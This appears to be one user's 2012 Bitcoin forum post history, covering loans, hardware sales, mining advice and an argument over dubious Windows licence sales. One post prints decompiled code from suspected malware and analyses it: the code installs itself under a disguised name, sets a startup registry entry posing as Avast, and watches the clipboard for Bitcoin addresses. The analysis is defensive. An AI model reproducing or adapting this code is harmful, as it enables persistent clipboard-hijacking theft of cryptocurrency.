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3821  Economy / Lending / Re: Looking for 5 BTC Loan, V. Short term again on: January 29, 2012, 02:48:16 AM
Read PM and I agree with the terms.
Here is the deal:

Code:
Sending 5 BTC 
          to 16Lr1j7zfxF5oG9EvvzxrxKhpsyxzKcAQj
Payback 6 BTC
          to 1BurtWEejbnKeBRsvcydJvsNztB1bXV5iQ
          on February 1, 2012
witnessed
3822  Other / Beginners & Help / Re: Have a problem on: January 29, 2012, 02:17:54 AM
https://freebitcoins.appspot.com/
3823  Economy / Goods / Re: Microsoft Windows XP Pro & Home: Real OEM Software with COA and Disc on: January 29, 2012, 02:09:49 AM
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I regualrly sell these on Ebay for $70+.
aside from the spelling error, why are you selling at 7 btc when you can supposedly get double on ebay?

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This is not Volume License or MSDN like many that are being sold that is illegal and will be deactivated by Microsoft at some point leaving you with a bootleg copy of windows.
oh that's ironic, considering your discs say "FOR DISTRIBUTION WITH NEW DELL PC".

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I have sold over 1000 of these without any problems. I am also a Top Rated Powerseller on Ebay.
link to ebay profile please.
3824  Bitcoin / Mining / Re: 5970's at newegg for $329 on: January 29, 2012, 01:51:58 AM
The demand is insatiable.  I ordered AS SOON as the auto notify got to my mailbox.  Must have made it just under the wire.....they were gone when I went back to look at the item page. 
and now you're selling them for $400+
3825  Economy / Services / Re: GPUMAX | The Bitcoin Mining Marketplace on: January 29, 2012, 01:17:19 AM
Wish I had more than 3ghash to throw at the site, the pay rate here is pretty rad  Grin
how much do you get paid per share?
3826  Economy / Goods / Re: [WTS] Prodigy Interactive Startup Kit w/ Hayes 2400 BPS Modem - NIB / SEALED ! on: January 29, 2012, 12:55:50 AM
0.001BTC? /sarcasm
serious bid of 1 satoshi, shipped Cool
3827  Economy / Goods / Re: Microsoft Windows XP Pro & Home: Real OEM Software with COA and Disc on: January 29, 2012, 12:44:38 AM
What I am saying about the volume license and MSDN is that Microsoft will deactivate large list of those license types once they become aware they are being abused. 99% of bootleg Microsoft products from China and the likes that can actually activate are either volume license or MSDN. What I am selling is OEM licenses. The exact same type of license as new egg sells. Yes, the media that transfers the software looks different but same license type.
you DO know that oem keys will fail to activate on non-oem computers, right?

I'm also pretty sure you can't rip off the COA from its original box/computer.
Yes, the disc are restore disc however they are the exact same as any other disc. It is the license key and type that matters. I guess if you wanted to pay Microsoft $50 for an unbranded OEM disc without the license key that would be fine too.
yeah, you're lying through your teeth.
3828  Economy / Goods / Re: $50 Visa Gift Card for BTC on: January 28, 2012, 11:13:58 PM
I am selling a sealed physical Visa gift card with a $50 value in exchange for Bitcoin priced at the MTGox low, shipped free anywhere within the US.

Feel free to contact me on steam under the ID "mofolicious" or thru bitcointalk pm. All items are priced according to the Bitcoin low. I have a rep in the Honest Traders thread: https://bitcointalk.org/index.php?topic=484.0 , and my Steam Games thread: https://bitcointalk.org/index.php?topic=12119.0. I have other rep if required. PM me offers & questions.

Pegging it to the low means someone is paying more than $50 for a $50 card.  Usually with prepaids, there's a discount, not premium.
no, prepaid cards have an activation fee. plus he has to go through the trouble of going to the store and buying it.
3829  Other / CPU/GPU Bitcoin mining hardware / Re: Best router / router firmware to use with cgminer on: January 28, 2012, 10:50:44 PM
if it's megabits, then it's too little.
First thing I would do is get to know how much traffic one RIG produces in 24 hours. If you get this, post it here.

Greetz

NetworkerZ
or use taskmanager and look at the network graph Roll Eyes
3830  Bitcoin / Development & Technical Discussion / Building bitcoin-qt on windows on: January 28, 2012, 06:15:00 PM
Can't get it to work  Huh


what i did:
3831  Other / CPU/GPU Bitcoin mining hardware / Re: Best router / router firmware to use with cgminer on: January 28, 2012, 05:48:36 PM
What is the connection speed at the moment? How high is the throuput cgminer produces at the moment? What throuput would you need with ~60 GHash?

Greetz
NetworkerZ

I am assuming you are asking about my internet connection speed? Currently it is 2Mb up and 1Mb down. I am not that skilled in network analysis and have not researched what is needed to look at the network traffic.
i'm guessing it's megabytes (not megabits) right? see if your router can log the bandwidth used + # of connections.

go solo?

pros:
does not generate a lot of (internet-)network traffic. only LAN traffic.

cons:
higher variance.
2 days per block isn't too bad.
3832  Other / CPU/GPU Bitcoin mining hardware / Re: Best router / router firmware to use with cgminer on: January 28, 2012, 04:32:24 PM
i don't think that wrv210 can even handle custom firmwares.

all miners behave the same way when it comes to connections. 1 constant longpoll connection + a few http GET. If i were you, i would get a high quality network switch that can handle all the persistent connections. a better internet connection wouldn't hurt either.
3833  Economy / Trading Discussion / Re: "allseingbiteye" - a virus, or just weird? on: January 28, 2012, 04:10:28 AM
most likely a virus

decompiled winmain
Code:
int __stdcall WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd)
{
  int v4; // ebx@1
  unsigned int v5; // eax@9
  SIZE_T v6; // edi@10
  HANDLE v7; // esi@10
  const char *v8; // ecx@11
  HANDLE v9; // eax@11
  void *v10; // esi@11
  const CHAR *v11; // eax@11
  int v12; // ecx@14
  int v13; // edi@14
  CHAR v14; // al@15
  HKEY hKey; // [sp+Ch] [bp-17Ch]@30
  char v17; // [sp+13h] [bp-175h]@3
  void *v18; // [sp+14h] [bp-174h]@29
  unsigned int v19; // [sp+28h] [bp-160h]@28
  const char *v20; // [sp+30h] [bp-158h]@9
  int v21; // [sp+40h] [bp-148h]@9
  unsigned int v22; // [sp+44h] [bp-144h]@9
  CHAR ExistingFileName; // [sp+4Ch] [bp-13Ch]@1
  char v24; // [sp+61h] [bp-127h]@2
  char v25; // [sp+68h] [bp-120h]@1
  CHAR String1[52]; // [sp+150h] [bp-38h]@11
  unsigned int v27; // [sp+184h] [bp-4h]@1
  int v28; // [sp+188h] [bp+0h]@1

  v27 = (unsigned int)&v28 ^ __security_cookie;
  v4 = operator new(4u);
  *(_DWORD *)v4 = 33120;
  dword_40D9E4 = v4;
  memcpy(&ExistingFileName, "c:\\windows\\mcfartietrby.exe", 0x1Cu);
  memset(&v25, 0, 0xE8u);
  if ( sub_401040() == *(_DWORD *)v4 + 9 )
    --v24;
  *(_DWORD *)v4 += 9;
  v17 = strcmp(&ExistingFileName, (const char *)"c:\\windows\\mcfartietray.exe") == 0;
  if ( sub_401040() == *(_DWORD *)v4 )
  {
    if ( v17 )
    {
      if ( byte_40D9E8 )
        GetModuleFileNameA(0, &ExistingFileName, 0x104u);
    }
  }
  if ( CopyFileA(&ExistingFileName, (LPCSTR)"c:\\windows\\mcfartietray.exe", 1) )
  {
    RegOpenKeyExA(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", 0, 2u, &hKey);
    RegSetValueExA(hKey, "Avast72", 0, 1u, "c:\\windows\\mcfartietray.exe", 0x1Cu);
    ShellExecuteA(0, 0, (LPCSTR)"c:\\windows\\mcfartietray.exe", 0, "c:\\", 0);
    goto LABEL_31;
  }
  CreateMutexA(0, 0, "mcfartietray");
  if ( GetLastError() == 183 )
  {
LABEL_31:
    v0 = 0;
    return 0;
  }
  v5 = GetTickCount();
  srand(v5);
  v22 = 15;
  v21 = 0;
  LOBYTE(v20) = 0;
  if ( v17 )
  {
    while ( 1 )
    {
      do
      {
        do
        {
          Sleep(0x1F4u);
          OpenClipboard(0);
          v7 = GetClipboardData(1u);
          CloseClipboard();
          v6 = GlobalSize(v7);
        }
        while ( v6 - 30 > 9 );
        OpenClipboard(0);
        v9 = GetClipboardData(1u);
        v10 = v9;
        v11 = (const CHAR *)GlobalLock(v9);
        lstrcpyA(String1, v11);
        GlobalUnlock(v10);
        CloseClipboard();
        v8 = v20;
        if ( v22 < 0x10 )
          v8 = (const char *)&v20;
      }
      while ( !strcmp(String1, v8) );
      v13 = v6 - 1;
      v12 = 0;
      if ( v13 <= 0 )
      {
LABEL_26:
        if ( String1[0] == 49 || String1[0] == 51 )
        {
          sub_401430();
          sub_401590();
          if ( v19 >= 0x10 )
            operator delete(v18);
        }
      }
      else
      {
        while ( 1 )
        {
          v14 = String1[v12];
          if ( v14 < 49 || v14 > 57 )
          {
            if ( (v14 < 97 || v14 > 122) && (v14 < 65 || v14 > 90) )
              break;
          }
          if ( v14 == 108 || v14 == 73 || v14 == 79 || v14 == 48 )
            break;
          ++v12;
          if ( v12 >= v13 )
            goto LABEL_26;
        }
      }
    }
  }
  return 0;
}
it adds a program to system startup. pretty suspicious imo.
virus scan https://www.virustotal.com/file/d99c08d052a02e82ca1ae0ca17300f30c2a4fe8861fe8426afb4367b30daa279/analysis/1327723958/
runtime analysis: http://anubis.iseclab.org/?action=result&task_id=17f90702efa19eb14a9df4ac9504bbf98&format=html
3834  Economy / Goods / Re: WTS MAGIC FLIGHT LAUNCH BOX VAPE (MFLB) on: January 28, 2012, 01:58:15 AM
what exactly is a MFLB?

is it some sort of cardboard box to cardboard plane conversion kit?
3835  Economy / Lending / Re: It's your BTC, so why shouldn't YOU get the Lion's share of the profits ? on: January 28, 2012, 01:55:00 AM
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1-99 BTC Loan - Single 15% Interest Payment.
Shocked
i'm interested! put me on the waiting list!
3836  Economy / Computer hardware / Re: [WTS] MSI Big Bang-Marshal (B3) w/ Intel Core i7 2600k on: January 27, 2012, 11:26:56 PM
This rig was only on for one week this month, CPU was never used for mining.
i know that the cpu wasn't used for mining. just wanted to have a rough idea on how much hours it was used.
3837  Economy / Computer hardware / Re: [WTS] MSI Big Bang-Marshal (B3) w/ Intel Core i7 2600k on: January 27, 2012, 10:10:20 PM
Sorry, just over 3 months.
so it's been running 24/7 for 3 months?
3838  Economy / Services / Re: C++/Java Programming and Tutoring [Escrow Req'd] -- 1st job 80% off! on: January 27, 2012, 09:57:05 PM
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I will also offer tutoring to beginners on the topics below, one-on-one via online tools such as PiratePad, and/or the IM protocol of your choice. Tutoring for the statically-priced courses will continue until you understand the topics or until you're obviously prolonging the process (the escrow will have to make that decision). I am a damn good Explainer of Things, however, so this will not be necessary. Payment will be via BTCrow, therefore, logs of the chat will be kept in the event of a dispute. I will pay all escrow fees.
what's the advantage in asking you to tutor when there are many online tutorials?
3839  Economy / Goods / Re: [WTS] 8x 5970 on: January 27, 2012, 09:52:30 PM
80*5 = $400, and it's used Undecided
3840  Bitcoin / Bitcoin Discussion / Re: Is there a way to combat this mining concentration AND get paid (some question on: January 27, 2012, 07:06:02 PM
I have no axe to grind about any pool.  If I'm going to use a pool it will be one that charges a fee and provides good service and has a business model that provides for longevity.  Being anti-deepbit just because they are successful isn't productive.  But folks are free to choose to do so.
>implying those two are mutually exclusive
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